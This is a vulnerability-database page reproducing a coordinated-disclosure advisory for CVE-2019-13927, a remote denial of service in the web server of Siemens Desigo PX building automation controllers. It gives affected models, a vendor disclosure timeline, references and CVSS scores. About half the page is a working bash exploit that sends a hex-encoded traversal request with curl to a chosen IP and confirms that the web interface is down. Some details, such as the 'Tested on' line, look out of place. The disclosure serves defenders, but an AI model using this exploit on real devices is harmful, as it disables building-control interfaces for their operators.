CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
AI Score
Confidence
High
EPSS
Percentile
30.2%
Title: Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
Advisory ID: ZSL-2019-5542
Type: Local/Remote
Impact: DoS
Risk: (3/5)
Release Date: 13.11.2019
Desigo PX is a modern building automation and control system for the entire field of building service plants. Scalable from small to large projects with highest degree of energy efficiency, openness and user-friendly operation.
The device contains a vulnerability that could allow an attacker to cause a denial of service condition on the device’s web server by sending a specially crafted HTTP message to the web server port (tcp/80). The security vulnerability could be exploited by an attacker with network access to an affected device. Successful exploitation requires no system privileges and no user interaction. An attacker could use the vulnerability to compromise the availability of the device’s web service. While the device itself stays operational, the web server responds with HTTP status code 404 (Not found) to any further request. A reboot is required to recover the web interface.
Siemens AG - <https://www.siemens.com>
Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
All firmware versions < V6.00.320
------
Model: PXC00-U, PXC64-U, PXC128-U
With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
All firmware versions < V6.00.320
------
Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
With activated web server
All firmware versions < V6.00.320
HP StorageWorks MSL4048 httpd
[06.06.2019] Vulnerability discovered.
[20.08.2019] Vendor contacted.
[21.08.2019] Vendor responds asking more details, providing PGP key.
[21.08.2019] Sent encrypted details to the vendor.
[22.08.2019] Vendor responds. Forwarded to product team.
[23.08.2019] Replied to the vendor.
[28.08.2019] Vendor confirms the vulnerability in all PX models and versions that have pxweb enabled.
[28.08.2019] Replied to the vendor.
[29.08.2019] Vendor replied. Assigns CVE and scheduled advisory release date. Working on a fix.
[30.08.2019] Replied to the vendor.
[23.10.2019] Follow up from the vendor. Expected advisory release: 12th of November.
[24.10.2019] Replied to the vendor.
[24.10.2019] Vendor provides additional information regarding versions and models affected.
[06.11.2019] Vendor releases fix for Desigo PX, advisory scheduled to be released on 12th of November.
[08.11.2019] Replied to the vendor.
[12.11.2019] Vendor releases advisory SSA-898181.
[13.11.2019] Coordinated public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
High five to Stevie!
[1] <https://support.industry.siemens.com/cs/document/109772802>
[2] <https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>
[3] <https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf>
[4] <https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt>
[5] <https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html>
[6] <https://new.siemens.com/global/en/company/stories/research-technologies/cybersecurity/rhythm-for-security.html>
[7] <https://vulners.com/cve/CVE-2019-13927>
[8] <https://nvd.nist.gov/vuln/detail/CVE-2019-13927>
[9] <https://exchange.xforce.ibmcloud.com/vulnerabilities/171445>
[10] <https://packetstormsecurity.com/files/155321>
[11] <https://www.exploit-db.com/exploits/47657>
[12] <https://www.us-cert.gov/ics/advisories/icsa-19-318-03>
[13] <https://www.symantec.com/security-center/vulnerabilities/writeup/110866>
[13.11.2019] - Initial release
[14.11.2019] - Added reference [9], [10], [11] and [12]
[15.11.2019] - Added reference [13]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/bin/bash
#
#
# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
#
#
# Vendor: Siemens AG
# Vendor web page: https://www.siemens.com
# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
# With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC00-U, PXC64-U, PXC128-U
# With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
# All firmware versions < V6.00.320
# ------
# Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
# With activated web server
# All firmware versions < V6.00.320
#
# Summary: Desigo PX is a modern building automation and control
# system for the entire field of building service plants. Scalable
# from small to large projects with highest degree of energy efficiency,
# openness and user-friendly operation.
#
# Desc: The device contains a vulnerability that could allow an attacker
# to cause a denial of service condition on the device's web server
# by sending a specially crafted HTTP message to the web server port
# (tcp/80). The security vulnerability could be exploited by an attacker
# with network access to an affected device. Successful exploitation
# requires no system privileges and no user interaction. An attacker
# could use the vulnerability to compromise the availability of the
# device's web service. While the device itself stays operational, the
# web server responds with HTTP status code 404 (Not found) to any further
# request. A reboot is required to recover the web interface.
#
# Tested on: HP StorageWorks MSL4048 httpd
#
# ================================================================================
# Expected result after sending the directory traversal sequence: /dir?dir=../../:
# --------------------------------------------------------------------------------
#
# $ curl http://10.0.0.17/index.htm
# </p><title>404 Not Found</title>
# <h1>404 Not Found</h1>
# Url '/INDEX.HTM' not found on server<p>
#
#
# ================================================================================
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - https://www.zeroscience.mk
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5542
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
#
# Vendor ID: SSA-898181
# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
#
# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
# CWE URL: https://cwe.mitre.org/data/definitions/472.html
# CVE ID: CVE-2019-13927
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
# CVSS v3.1 Base Score: 5.3
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
#
#
# 06.06.2019
#
echo -ne "\n----------------------------------"
echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
echo -ne "\n----------------------------------\n"
if [ "$#" -ne 1 ]; then
echo -ne "\nUsage: $0 [ipaddr]\n\n"
exit
fi
IP=$1
TARGET="http://$IP/"
PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
echo -ne "\n[+] Sending payload to $IP on port 80."
curl -s "$TARGET$PAYLOAD" > /dev/null
echo -ne "\n[*] Done"
echo -ne "\n[+] Checking if exploit was successful..."
status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
if [ "$status" == "404" ]; then
echo -ne "\n[*] Exploit successful!\n"
else
echo -ne "\n[-] Exploit unsuccessful.\n"
exit
fi
</p></body></html>
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
AI Score
Confidence
High
EPSS
Percentile
30.2%